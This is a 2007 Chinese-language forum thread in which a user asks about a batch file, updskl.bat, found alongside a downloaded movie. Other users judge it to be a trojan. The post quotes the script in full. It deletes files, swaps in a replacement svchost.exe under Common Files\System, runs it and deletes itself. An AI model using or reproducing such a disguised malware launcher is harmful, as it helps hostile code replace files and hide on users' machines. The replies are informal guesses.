Board logo

标题: 下载电影后发现批处理文件updskl.bat,不明白其意图 [打印本页]

作者: enjoyer     时间: 2007-7-29 21:25    标题: 下载电影后发现批处理文件updskl.bat,不明白其意图
电影文件夹中含有批处理文件updskl.bat,内容如下:
@echo off
:loop
del "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\ver.txt"
del "C:\Program Files\Common Files\System\she.dll"
if exist "C:\Program Files\Common Files\System\svchost.exe" goto loop
C:
cd C:\Program Files\Common Files\System\
ren svchostnew.exe svchost.exe
call "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\updskl.bat"

第一步就强行删除原有的svchost.exe,第二步重命名svchostnew.exe 为svchost.exe然后执行之。看样子是想更新电脑中System夹下的svchost.exe,不明白是什么意图?有没有危险啊。请大家帮忙分析下,谢谢各位!

Last edited by enjoyer on 2007-7-29 at 09:36 PM ]

作者: wudixin96     时间: 2007-7-29 21:32
有什么问题吗?

可能是模拟svchost进程吧。

作者: enjoyer     时间: 2007-7-29 21:39
不知道跟下载的电影文件是什么关系,还有svchost进程我也不了解,会不会影响我系统的稳定性呢?请楼上朋友帮忙分析下,谢谢了。

作者: slore     时间: 2007-7-29 21:53
系统的SVCHOST在SYSTEM32下,那个地方的不是正常的系统文件。

作者: BWSkyer     时间: 2007-7-29 22:09
有点危险吧,不建议运行,感觉是的~~毕竟电影和svchost没有什么关系吧

作者: enjoyer     时间: 2007-7-30 00:04
就怕是自动运行的。如果不自动运行那也没什么好怕的。

作者: kich     时间: 2007-7-30 12:24
我想你那个电影文件可能是假冒的!图标是,但文件最后的后缀不是!
注意,是最后,
会有这样的文件:
001.avi(N多空格).exe
图标是假的

作者: frankkf     时间: 2007-7-30 16:47
楼上说的这个很有可能
建议楼主还是看一下~

作者: voiL     时间: 2007-7-30 21:30
不知道哈,反正不要去打开它就好了...

作者: taoty     时间: 2007-8-2 22:58
这个批处理肯定有问题,svchost.exe路径不正确。

作者: jinlizhpc     时间: 2007-8-3 12:45
危险性,勿行

作者: webjump     时间: 2007-8-3 17:07
应该是木马

作者: enjoyer     时间: 2007-8-3 21:41
谢谢大家帮忙!下载的电影文件是真的(.rm格式),可以正常播放。也没有再理会这个批处理文件。不过有没有在电影播放中偷偷运行就不知道了。

作者: ldr2zjj     时间: 2007-8-7 01:29
把那个文件改名了再研究~~

作者: kingyn     时间: 2007-8-27 19:44
svchost.exe是很重要的
楼主应该多点小心

作者: halulove     时间: 2007-8-28 08:09
svhost.exe是系统的加载服务进程!
你发的批处理,可能是病毒,svhostnew.exe伪装成svhost.exe运行!